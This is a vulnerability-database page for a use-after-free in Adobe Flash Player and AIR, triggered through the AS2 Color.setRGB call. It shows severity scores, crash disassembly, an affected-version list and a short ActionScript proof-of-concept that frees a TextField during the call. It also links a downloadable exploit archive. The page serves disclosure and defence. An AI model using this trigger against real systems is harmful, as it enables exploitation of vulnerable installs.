Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 37860
Publication date : 2015-08-18 22h00 +00:00
Author : bilou
EDB Verified : Yes
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1
REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push esi
.text:004B82D1 mov esi, [esp+4+arg_0]
.text:004B82D5 push edi
.text:004B82D6 mov edi, ecx
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
.text:004B82DE and ecx, 0FFFFFFFEh
.text:004B82E1 add ecx, 3Ch
.text:004B82E4 mov eax, esi
.text:004B82E6 call sub_4B0724 ; crash below
...
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
.text:004B0726 cmp edx, [eax]
.text:004B0728 jnz short loc_4B077E
Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
tf.removeTextField()
return 0x41414142
}
var c = new Color(tf)
c.setRGB(o)
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip
Products Mentioned
Configuraton 0
Adobe>>Air >> Version To (including) 18.0.0.144
Adobe>>Air_sdk >> Version To (including) 18.0.0.144
Adobe>>Air_sdk_\&_compiler >> Version To (including) 18.0.0.144
Configuraton 0
Adobe>>Flash_player >> Version To (including) 13.0.0.289
Adobe>>Flash_player >> Version 14.0.0.125
Adobe>>Flash_player >> Version 14.0.0.145
Adobe>>Flash_player >> Version 14.0.0.176
Adobe>>Flash_player >> Version 14.0.0.179
Adobe>>Flash_player >> Version 15.0.0.152
Adobe>>Flash_player >> Version 15.0.0.167
Adobe>>Flash_player >> Version 15.0.0.189
Adobe>>Flash_player >> Version 15.0.0.223
Adobe>>Flash_player >> Version 15.0.0.239
Adobe>>Flash_player >> Version 15.0.0.246
Adobe>>Flash_player >> Version 16.0.0.235
Adobe>>Flash_player >> Version 16.0.0.257
Adobe>>Flash_player >> Version 16.0.0.287
Adobe>>Flash_player >> Version 16.0.0.296
Adobe>>Flash_player >> Version 17.0.0.134
Adobe>>Flash_player >> Version 17.0.0.169
Adobe>>Flash_player >> Version 17.0.0.188
Adobe>>Flash_player >> Version 17.0.0.190
Adobe>>Flash_player >> Version 18.0.0.160
Adobe>>Flash_player >> Version 18.0.0.194
Apple>>Mac_os_x >> Version -
Microsoft>>Windows >> Version -
Configuraton 0
Adobe>>Flash_player >> Version To (including) 11.2.202.468
Linux>>Linux_kernel >> Version -
References